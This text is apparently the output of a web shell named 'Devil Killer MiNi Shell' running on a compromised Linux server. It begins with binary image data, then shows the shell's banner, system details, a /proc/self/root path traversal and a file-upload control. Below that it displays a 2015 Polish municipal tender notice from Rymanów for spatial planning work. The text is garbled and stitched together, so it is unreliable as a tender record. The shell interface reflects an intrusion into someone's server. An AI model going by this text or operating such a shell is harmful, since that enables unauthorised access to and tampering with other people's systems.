JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/self/root/proc/self/root/home/vmanager/www/common/web/tenders/20150817/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //proc/self/root/proc/self/root/home/vmanager/www/common/web/tenders/20150817/210324-N-2015.html

<p class="kh_header"><b>Rymanów: Opracowanie Miejscowych Planów Zagospodarowania Przestrzennego dla miejscowości na terenie Gminy Rymanów  oraz opracowanie Zmian Studium Uwarunkowań i Kierunków Zagospodarowania Przestrzennego
 Gminy Rymanów</b><br>
<b>Numer ogłoszenia: 210324 - 2015; data zamieszczenia: 17.08.2015</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b>
<!--zamówienia publicznego.</p>-->
<table class="text2">
<tr><td style="border: solid 1px; width:15px black; text-align: center;"><b>V</b></td>
<td>zamówienia publicznego</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>zawarcia umowy ramowej</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>ustanowienia dynamicznego systemu zakupów (DSZ)</td></tr>
</table>


<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Rymanów , ul. Mitkowskiego 14a, 38-480 Rymanów, woj. podkarpackie, tel. 013 4355006, faks 013 4355765.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.rymanow.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Opracowanie Miejscowych Planów Zagospodarowania Przestrzennego dla miejscowości na terenie Gminy Rymanów  oraz opracowanie Zmian Studium Uwarunkowań i Kierunków Zagospodarowania Przestrzennego
 Gminy Rymanów.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1. Przedmiotem zamówienia jest opracowanie Miejscowych Planów Zagospodarowania Przestrzennego dla miejscowości na terenie Gminy Rymanów  oraz opracowanie Zmian Studium Uwarunkowań i Kierunków Zagospodarowania Przestrzennego Gminy Rymanów. Przedmiot zamówienia podzielony jest na następujące części:
1) część nr 1 zamówienia: Opracowanie Miejscowego Planu Zagospodarowania Przestrzennego POSADA GÓRNA/2014, zgodnie z Uchwałą Nr LVII/579/14 Rady Miejskiej w Rymanowie z dnia 29 sierpnia 2014r. ( pow. ok. 120 ha).
(treść uchwały zgodna z załącznikiem nr 11)
UWAGA - na części terenów objętych przedmiotem zamówienia występują: obszar  uzdrowiska, gdzie obowiązują strefy ochrony uzdrowiskowej B, C, Obszar Chronionego Krajobrazu Beskidu Niskiego.
2) część nr 2 zamówienia: Opracowanie Miejscowego Planu Zagospodarowania Przestrzennego KLIMKÓWKA/2014, zgodnie z Uchwałą Nr LVII/580/14 Rady Miejskiej w Rymanowie z dnia 29 sierpnia 2014r. ( pow. ok. 217 ha).
(treść uchwały zgodna z załącznikiem nr 11)
UWAGA - na części terenów objętych przedmiotem zamówienia występują: obszar  strefy ochrony uzdrowiskowej C, Obszar Chronionego Krajobrazu Beskidu Niskiego, Obszar NATURA 2000, obszary i tereny górnicze, projektowane rezerwaty.
3) część nr 3 zamówienia: Opracowanie Miejscowego Planu Zagospodarowania Przestrzennego SIENIAWA/2014, zgodnie z Uchwałą Nr LVII/581/14 Rady Miejskiej w Rymanowie z dnia 29 sierpnia 2014r. (pow. ok. 222 ha)
(treść uchwały zgodna z załącznikiem nr 11)
UWAGA - na części terenów objętych przedmiotem zamówienia występują: Obszar Chronionego Krajobrazu Beskidu Niskiego, Obszar NATURA 2000.
4) część nr 4 zamówienia: Opracowanie Miejscowego Planu Zagospodarowania Przestrzennego LADZIN/2014, zgodnie z Uchwałą Nr LVII/582/14 Rady Miejskiej w Rymanowie z dnia 29 sierpnia 2014r.(pow. ok. 78 ha).
(treść uchwały zgodna z załącznikiem nr 11)
5) część nr 5 zamówienia: Opracowanie Miejscowego Planu Zagospodarowania Przestrzennego ŁAZY-FARMA FOTOWOLTAICZA, zgodnie z Uchwałą NR XXXIV/359/13 Rady Miejskiej w Rymanowie z dnia 24 stycznia 2013r. (pow. ok. 3 ha).
(treść uchwały zgodna z załącznikiem nr 11)
6)    część nr 6 zamówienia: 
6.1) opracowanie Zmiany Studium Uwarunkowań i Kierunków Zagospodarowania Przestrzennego Gminy Rymanów, zgodnie z załącznikiem graficznym Nr 1 (jeden obszar farmy fotowoltaicznej) do Uchwały Nr IV/31/15 Rady Miejskiej w Rymanowie z dnia 10 lutego 2015r.
(treść uchwały zgodna z załącznikiem nr 11)
6.2) opracowanie Zmiany Studium Uwarunkowań i Kierunków Zagospodarowania Przestrzennego Gminy Rymanów, zgodnie z Załącznikiem Graficznym Nr 1 do Uchwały Nr V/52/15 Rady Miejskiej w Rymanowie z dnia 20 marca 2015r. 
(treść uchwały zgodna z załącznikiem nr 11)
6.3) opracowanie Zmiany Studium Uwarunkowań i Kierunków Zagospodarowania Przestrzennego Gminy Rymanów, zgodnie z Załącznikiem Graficznym Nr 2 do Uchwały Nr V/52/15 Rady Miejskiej w Rymanowie z dnia 20 marca 2015r. 
(treść uchwały zgodna z załącznikiem nr 11)
6.4) opracowanie Zmiany Studium Uwarunkowań i Kierunków Zagospodarowania Przestrzennego Gminy Rymanów, zgodnie z Załącznikiem Graficznym Nr 3 do Uchwały Nr V/52/15 Rady Miejskiej w Rymanowie z dnia 20 marca 2015r.
(treść uchwały zgodna z załącznikiem nr 11)
6.5) opracowanie Zmiany Studium Uwarunkowań i Kierunków Zagospodarowania Przestrzennego Gminy Rymanów, zgodnie z załącznikiem graficznym Nr  1  (z wyłączeniem obszaru planowanej farmy fotowoltaicznej Łazy) do Uchwały Nr IV/31/15 Rady Miejskiej w Rymanowie z dnia 10 lutego 2015r.
(treść uchwały zgodna z załącznikiem nr 11)
6.6) opracowanie Zmiany Studium Uwarunkowań i Kierunków Zagospodarowania Przestrzennego Gminy Rymanów, zgodnie z załącznikiem graficznym Nr 2 do Uchwały Nr IV/31/15 Rady Miejskiej w Rymanowie z dnia 10 lutego 2015r.
(treść uchwały zgodna z załącznikiem nr 11)
UWAGA - na części terenów objętych przedmiotem zamówienia występują: obszar  uzdrowiska, gdzie obowiązują strefy ochrony uzdrowiskowej A,B,C, Obszar Chronionego Krajobrazu Beskidu Niskiego, Obszar NATURA 2000, obszary i tereny górnicze.
7) część nr 7 zamówienia: 
7.1) opracowanie Zmiany Miejscowego Planu Zagospodarowania Przestrzennego RYMANÓW ZDRÓJ, zgodnie z Uchwałą Nr V/55/15 Rady Miejskiej w Rymanowie z dnia 20 marca 2015r. (dwa obszary w okolicach terenu basenu w Rymanowie Zdroju).
(treść uchwały zgodna z załącznikiem nr 11)
7.2) opracowanie Zmiany Miejscowego Planu Zagospodarowania Przestrzennego RYMANÓW ZDRÓJ, zgodnie z Uchwałą Nr LVIII/597/14 Rady Miejskiej w Rymanowie z dnia 24 października 2014r.
(treść uchwały zgodna z załącznikiem nr 11)
7.3) opracowanie Zmiany Miejscowego Planu Zagospodarowania Przestrzennego RYMANÓW ZDRÓJ, zgodnie z Uchwałą Nr V/54/15 Rady Miejskiej w Rymanowie z dnia 20 marca 2015r
UWAGA - Opracowanie zmian Miejscowego Planu Zagospodarowania Przestrzennego RYMANÓW ZDRÓJ na obszarze  uzdrowiska, gdzie obowiązują strefy ochrony uzdrowiskowej A,B,C, Obszar Chronionego Krajobrazu Beskidu Niskiego, Obszar NATURA 2000, obszary i tereny górnicze.
(treść uchwały zgodna z załącznikiem nr 11)
8) część nr 8 zamówienia: 
8.1) opracowanie Zmiany Miejscowego Planu Zagospodarowania Przestrzennego RYMANÓW, zgodnie z  załącznikiem graficznym Nr 1 do Uchwały Nr V/53/15 Rady Miejskiej w Rymanowie z dnia 20 marca 2015r. (obszar planowanej farmy fotowoltaicznej w okolicach Beskiej Góry w Rymanowie).
(treść uchwały zgodna z załącznikiem nr 11)
8.2) opracowanie Zmiany Miejscowego Planu Zagospodarowania Przestrzennego RYMANÓW, zgodnie z załącznikiem graficznym Nr 2 do Uchwały Nr V/53/15 Rady Miejskiej w Rymanowie z dnia 20 marca 2015r. (obszar w istniejącej strefie sanitarnej cmentarza w Rymanowie).
(treść uchwały zgodna z załącznikiem nr 11)
8.3) opracowanie Zmiany Miejscowego Planu Zagospodarowania Przestrzennego RYMANÓW, zgodnie z Uchwałą Nr IV/32/15 Rady Miejskiej w Rymanowie z dnia 10 lutego 2015r.
(treść uchwały zgodna z załącznikiem nr 11)
8.4) opracowanie Zmiany Miejscowego Planu Zagospodarowania Przestrzennego RYMANÓW, zgodnie z załącznikiem graficznym Nr 3 do Uchwały Nr V/53/15 Rady Miejskiej w Rymanowie z dnia 20 marca 2015r.,
(treść uchwały zgodna z załącznikiem nr 11)
2. Pozostały zakres prac obejmuje:
1) Wykonanie: opracowania ekofizjograficznego, prognozy skutków wpływu ustaleń planu na środowisko przyrodnicze, prognozy skutków finansowych uchwalenia planu oraz innych materiałów planistycznych określonych w par. 2 pkt 5 rozporządzenia Ministra Infrastruktury z dnia 26 sierpnia 2003 roku w sprawie wymaganego zakresu projektu miejscowego planu zagospodarowania przestrzennego,
3. Wykonawca w ramach umowy na swój koszt, który wlicza się do wynagrodzenia umownego, zgodnie z trybem sporządzania i uchwalania miejscowego planu zagospodarowania przestrzennego zobowiązany jest w szczególności do:
1) wykonania czynności określonych w art. 14, 15, 17, 19, 20 ustawy - o planowaniu i zagospodarowaniu przestrzennym,
2) przygotowania odpowiednio uchwał i zarządzeń:
a) rozpatrzeniu wniosków dotyczących projektu miejscowego planu zagospodarowania przestrzennego
b) o rozpatrzeniu  uwag do projektu miejscowego planu zagospodarowania przestrzennego
c) o uchwaleniu miejscowego planu zagospodarowania przestrzennego wraz z załącznikami

3) przygotowania ogłoszeń i obwieszczeń:
a) podjęciu uchwały o przystąpieniu do sporządzenia miejscowego planu zagospodarowania przestrzennego,
b) o wyłożeniu projektu miejscowego planu zagospodarowania przestrzennego wraz z załącznikami
4) przygotowania zawiadomień o podjęciu uchwały o przystąpieniu do sporządzenia miejscowego planu zagospodarowania przestrzennego do instytucji i organów właściwych do uzgadniania i opiniowania projektu miejscowego planu zagospodarowania przestrzennego,
5) zajęcia stanowiska
a) do rozpatrzenia złożonych uwag do projektu miejscowego planu zagospodarowania przestrzennego,
b) do wprowadzenia zmian wynikających z uzyskanych opinii i dokonanych uzgodnień,
c) do rozpatrzenia złożonych uwag dotyczących wyłożonego  projektu miejscowego planu zagospodarowania przestrzennego, 
d) do rozstrzygnięcia nadzorczego wojewody, stwierdzającego nieważność uchwały w sprawie miejscowego planu zagospodarowania przestrzennego (w przypadku wydania rozstrzygnięcia),
e) w przypadku zaskarżenia uchwały w sprawie miejscowego planu zagospodarowania przestrzennego w trybie art. 101 ust. 1 ustawy z dnia 8 marca 1990 roku o samorządzie gminnym,
6) przygotowania wystąpień
a) uzyskanie opinii o projekcie miejscowego planu zagospodarowania przestrzennego,
b) o uzgodnienia projektu miejscowego planu zagospodarowania przestrzennego,
c) o uzyskanie zgody na zamianę przeznaczenia gruntów rolnych i leśnych na cele nierolnicze i nieleśne (w zależności od potrzeb) wraz z załącznikami
7) wprowadzenia zmian do projektu miejscowego planu zagospodarowania przestrzennego wynikających:
a) z uzyskanych opinii i dokonanych uzgodnień,
b) z rozpatrzenia  uwag do projektu miejscowego planu zagospodarowania przestrzennego,
8) ponawiania czynności wraz z przygotowaniem odpowiednich dokumentów:
a) wynikających z uwzględnienia przez burmistrza lub radę gminy uwag do projektu miejscowego planu zagospodarowania przestrzennego,
b) wynikających z prawomocnego rozstrzygnięcia nadzorczego wojewody stwierdzającego nieważność uchwały w sprawie miejscowego planu zagospodarowania przestrzennego,
9) prezentacji projektu miejscowego planu zagospodarowania przestrzennego i zagadnień wynikających z czynności związanych ze sporządzaniem miejscowego planu zagospodarowania przestrzennego na forum:
a)  komisji urbanistyczno-architektonicznej,
b) w trakcie dyskusji publicznej nad przyjętymi w projekcie miejscowego planu zagospodarowania przestrzennego rozwiązaniami,
c) organów gminy w trakcie czynności związanych ze sporządzaniem i uchwalaniem miejscowego planu zagospodarowania przestrzennego,
d) co najmniej 1-dniowego pobytu w siedzibie Urzędu Miasta i Gminy w Rymanowie w okresie wyłożenia projektu miejscowego planu zagospodarowania przestrzennego do publicznego wglądu i udzielania zainteresowanym informacji o projekcie wyłożonego miejscowego planu zagospodarowania przestrzennego,
e) sporządzenia dokumentacji prac planistycznych zgodnie z par. 12 rozporządzenia Ministra Infrastruktury z dnia 26 sierpnia 2003 r. - w sprawie wymaganego zakresu projektu miejscowego planu zagospodarowania przestrzennego,
f) przygotowania w ustawowym terminie ewentualnej skargi do sądu administracyjnego na rozstrzygnięcie nadzorcze wojewody, stwierdzające nieważność uchwały w sprawie miejscowego planu zagospodarowania przestrzennego.
4. Kompletne opracowanie projektowe, stanowiące przedmiot odbioru, które Projektant  dostarczy Zamawiającemu składać się będzie (dla opracowania MPZP i zmian do MPZP):
1) z 6 kompletów projektu miejscowego planu zagospodarowania przestrzennego,
2) z 2 egzemplarzy dokumentacji prac planistycznych określonych w par. 12 rozporządzenia Ministra Infrastruktury z dnia 26 sierpnia 2003 roku w sprawie wymaganego zakresu projektu miejscowego planu zagospodarowania przestrzennego,
3) z 2 egzemplarzy: opracowania ekofizjograficznego, prognozy skutków wpływu ustaleń planu na środowisko przyrodnicze, prognozy skutków finansowych uchwalenia planu,
4) z 1 kompletu opracowań uzupełniających niezbędnych do sporządzenia przedmiotu zamówienia, w tym wymaganych przepisami szczególnymi lub przez organy uzgadniające,
5) z 2 egzemplarzy kolorowego rysunku miejscowego planu zagospodarowania przestrzennego podklejonego na płótnie lub tworzywie sztucznym lub obustronnie zafoliowanego w skali 1:1000,
6) z 2 egzemplarzy kolorowego rysunku miejscowego planu zagospodarowania przestrzennego na piance foliowanej w skali 1:1000,
7) 3 CD z zapisanym tekstem miejscowego planu zagospodarowania przestrzennego w formacie Word, oraz z zapisanym czarno-białym i kolorowym rysunkiem planu w formacie bmp, jpg, tif, pdf  przy rozdzielczości minimum 600 dpi i kolorze minimum 8 bit, a także treści rysunku miejscowego planu zagospodarowania przestrzennego w formacie dwg lub dgn lub cdr.

5. Zakres rzeczowy zamówienia: 
1) Opracowanie zmiany Studium Uwarunkowań i Kierunków Zagospodarowania Przestrzennego Gminy Rymanów,  w granicach obejmujących teren, wskazanych w załączniku graficznym do uchwały, zawierające: 
- część tekstową i graficzną w skali 1:10 000 
- uwzględniające zasady określone w koncepcji przestrzennego zagospodarowania kraju, 
- ustalenia strategii rozwoju i planu zagospodarowania przestrzennego województwa, 
- ustalenia strategii rozwoju gminy, 
a) Przygotowanie materiałów geodezyjnych do opracowania wymienionego w pkt.1 
b) Przedmiot zamówienia należy wykonać według procedur i problematyki określonych w: 
- ustawie z dnia 27 marca 2003 r. o planowaniu i zagospodarowaniu przestrzennym (t.j. Dz. U. z 2015 r., poz. 199), 
- Rozporządzeniu Ministra Infrastruktury z dnia 28 kwietnia 2004 r. w sprawie zakresu projektu studium uwarunkowań i kierunków zagospodarowania przestrzennego gminy (Dz. U. z 2004 r. Nr 118, poz. 1233), 
- ustawie z dnia 3 października 2008 r. o udostępnianiu informacji o środowisku i jego ochronie, udziale społeczeństwa w ochronie środowiska oraz o ocenach oddziaływania na środowisko (t.j. Dz. U. z 2013 r. z późn. zm.). 
c) Wykonawca jest zobowiązany do: 
- wykonania materiałów planistycznych, sporządzonych na podstawie przepisów odrębnych na potrzeby projektu studium (aktualne na dzień przystąpienia do sporządzenia projektu studium), 
- uczestniczenia w posiedzeniach Komisji Rady Miejskiej w Rymanowie, sesji Rady Miejskiej, Gminnej Komisji Urbanistyczno - Architektonicznej, w dyskusji publicznej na temat rozwiązań przyjętych w projekcie zmiany studium, 
- uczestniczenia w innych spotkaniach, których konieczność wyniknie w trakcie procedury oraz realizacji zadania, w przypadkach i terminach wskazanych przez Zamawiającego, 
- przygotowania propozycji sposobu rozpatrzenia wniosków dotyczących projektu zmiany studium, 
- uzyskania opinii i uzgodnień właściwych instytucji i organów, 
- wprowadzenia zmian wynikających z uzyskanych opinii i dokonanych uzgodnień, 
- przygotowania projektu studium do wyłożenia do publicznego wglądu wraz z prognozą oddziaływania na środowisko, 
- przygotowania propozycji rozpatrzenia uwag dotyczących projektu zmiany studium, 
- opracowania ostatecznego projektu studium do uchwalenia przez Radę Miejską, 
- skompletowanie dokumentacji formalno-prawnej celem przekazania do Wojewody Podkarpackiego oraz udział w czynnościach niezbędnych do ewentualnego doprowadzenia studium do zgodności z przepisami prawnymi w przypadku stwierdzenia nieważności uchwały
d) Zamawiającemu należy przekazać wykonane opracowanie zmiany studium w formie i ilościach: 
- trzy komplety kolorowego rysunku studium w skali 1:10000 (w tym jeden z rysunkiem naklejonym na płótno lub zalaminowany), 
- trzy teksty ujednolicone studium w wersji tradycyjnej, oprawione 
- studium w formie elektronicznej (2 płyty CD,DVD), w tym część tekstowa w formacie MS Word, część graficzna w formacie GeoTIFF lub TIFF, 
- jedne egzemplarz prognozy oddziaływania na środowisko w formie papierowej, jeden w wersji elektronicznej w formacie MS Word,
6. Etapy płatności: płatności każdorazowo po zakończeniu etapu prac określonych w harmonogramie  - załącznik nr 10 do SIWZ. Pierwsza płatność w 2016r., zgodnie z Uchwałą NR X/115/15 Rady Miejskiej w Rymanowie z dnia 24 lipca 2015r. o zaciągnięciu zobowiązania.
7. Mapy zasadnicze, niezbędne do wykonania prac objętych przedmiotem zamówienia po stronie Wykonawcy.
8. Materiały wyjściowe do wykonania prac objętych przedmiotem zamówienia tj.:
- rysunek i tekst Studium Uwarunkowań i Kierunków Zagospodarowania Przestrzennego Gminy Rymanów oraz zmian Studium;
- rysunek i tekst obowiązującego Miejscowego Planu Zagospodarowania Przestrzennego RYMANÓW oraz Zmian Miejscowego Planu Zagospodarowania Przestrzennego RYMANÓW; 
- rysunek i tekst obowiązującego Miejscowego Planu Zagospodarowania Przestrzennego RYMANÓW ZDRÓJ oraz Zmian Miejscowego Planu Zagospodarowania Przestrzennego RYMANÓW ZDRÓJ; 
- ewentualne teksty i rysunki planów zagospodarowania dla obszarów sąsiadujących z obszarami opracowania; opracowania ekofizjograficzne dla obszarów objętych przedmiotem zamówienia;
- gminna ewidencja zbytków
do uzyskania w siedzibie Zamawiającego: Urząd Gminy w Rymanowie: 38-480 Rymanów,                        ul. Mitkowskiego 14a, pokój nr 213.
9. Wykonawcy zaleca się dokonać wizji lokalnej w terenie przedmiotowego zamówienia..</p>
<p><b>II.1.5)
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
<td><b>przewiduje się udzielenie zamówień uzupełniających</b></td></tr>
</table>                            
</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li>
<li></li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 71.41.00.00-5.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 8.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 1. Przystępując do niniejszego postępowania każdy Wykonawca zobowiązany jest wnieść
wadium w wysokości:
1)  część nr 1 zamówienia - 1 800,00 zł (słownie: jeden tysiąc osiemset złotych),
2)  część nr 2 zamówienia - 2 000,00 zł (słownie: dwa tysiące złotych),
3)  część nr 3 zamówienia - 1 900,00 zł (słownie: jeden tysiąc dziewięćset złotych),
4)  część nr 4 zamówienia - 1 200,00 zł (słownie: jeden tysiąc dwieście złotych),
5)  część nr 5 zamówienia - 400,00 zł (słownie: czterysta złotych),
6)  część nr 6 zamówienia - 700,00 zł (słownie: siedemset złotych),
7)  część nr 7 zamówienia - 700,00 zł (słownie: siedemset złotych)
8)  część nr 8 zamówienia - 700,00 zł (słownie: siedemset złotych)
2. Wadium może być wniesione w jednej lub kilku następujących formach:
1) pieniądzu,
2) poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo - kredytowej, z tym że poręczenie kasy jest zawsze poręczeniem pieniężnym,
3) gwarancjach bankowych,
4) gwarancjach ubezpieczeniowych
5) poręczeniach udzielanych przez podmioty, o których mowa w art. 6 b ust. 5 pkt 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (tekst jednolity Dz. U. Nr 42, poz. 275).</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Odnośnie powyższego warunku Zamawiający nie precyzuje żadnych wymagań, których  spełnianie Wykonawca zobowiązany jest wykazać w sposób szczególny. Ocena spełnienia warunku zostanie dokonana na podstawie złożonego oświadczenia -  Załącznik nr 2 do SIWZ.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W celu potwierdzenia posiadania niezbędnej wiedzy i  doświadczenia Wykonawcy spełnią poniższe wymagania:
a) cześć nr 1, 2, 3, 4, 5 zamówienia - Wykonawca wykaże się, że w ostatnich trzech latach przez upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wykonaniem co najmniej dwóch uchwalonych i obowiązujących miejscowych planów zagospodarowania przestrzennego. 
b) cześć nr 6 zamówienia - Wykonawca wykaże się, że w ostatnich trzech latach przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wykonaniem co najmniej dwóch uchwalonych i obowiązujących zmian studium uwarunkowań i kierunków zagospodarowania przestrzennego gminy (w tym w co najmniej jednym przypadku w gminie uzdrowiskowej, na obszarze występowania stref ochrony uzdrowiskowej). 
c) cześć nr 7 zamówienia - Wykonawca wykaże się, że w ostatnich trzech latach przez upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wykonał co najmniej trzy uchwalone i obowiązujące miejscowe plany zagospodarowania przestrzennego lub zmiany miejscowych planów zagospodarowania przestrzennego ( w tym w co najmniej jednym przypadku w Gminie uzdrowiskowej, na obszarze występowania stref ochrony uzdrowiskowej). 
d) cześć nr 8 zamówienia - Wykonawca wykaże się, że w ostatnich trzech latach przez upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wykonał co najmniej trzy uchwalone i obowiązujące miejscowe plany zagospodarowania przestrzennego lub zmiany miejscowych planów zagospodarowania przestrzennego. 
